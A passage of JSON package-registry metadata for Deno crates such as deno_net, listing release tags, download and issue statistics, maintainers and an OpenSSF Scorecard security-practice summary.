:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3417ab61db8ccf1ae9a660fa","kind":"commit","published_at":"2018-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T03:52:13.735Z","dependent_packages_count":16,"downloads":757590,"downloads_period":"total","dependent_repos_count":30,"rankings":{"downloads":5.1103237958561305,"dependent_repos_count":5.161531558480407,"dependent_packages_count":2.628430419501982,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.2889882429930957},"purl":"pkg:cargo/deno_net","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_net","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_net","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_net/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_net/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_net/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_net/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_net/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_net/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_net/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T16:24:06.683Z","updated_at":"2022-11-07T16:24:06.683Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:24.144Z","updated_at":"2023-07-18T22:41:24.144Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":7246594,"name":"deno_cli_lib_windmill","ecosystem":"cargo","description":"Deno cli lib for the needs of windmill","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":2,"first_release_published_at":"2023-04-01T14:14:07.761Z","latest_release_published_at":"2023-04-03T16:37:01.501Z","latest_release_number":"0.104.0","last_synced_at":"2026-09-07T23:01:43.706Z","created_at":"2023-04-01T14:43:38.067Z","updated_at":"2026-09-07T23:01:43.707Z","registry_url":"https://crates.io/crates/deno_cli_lib_windmill/","install_command":"cargo install deno_cli_lib_windmill","documentation_url":"https://docs.rs/deno_cli_lib_windmill/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source 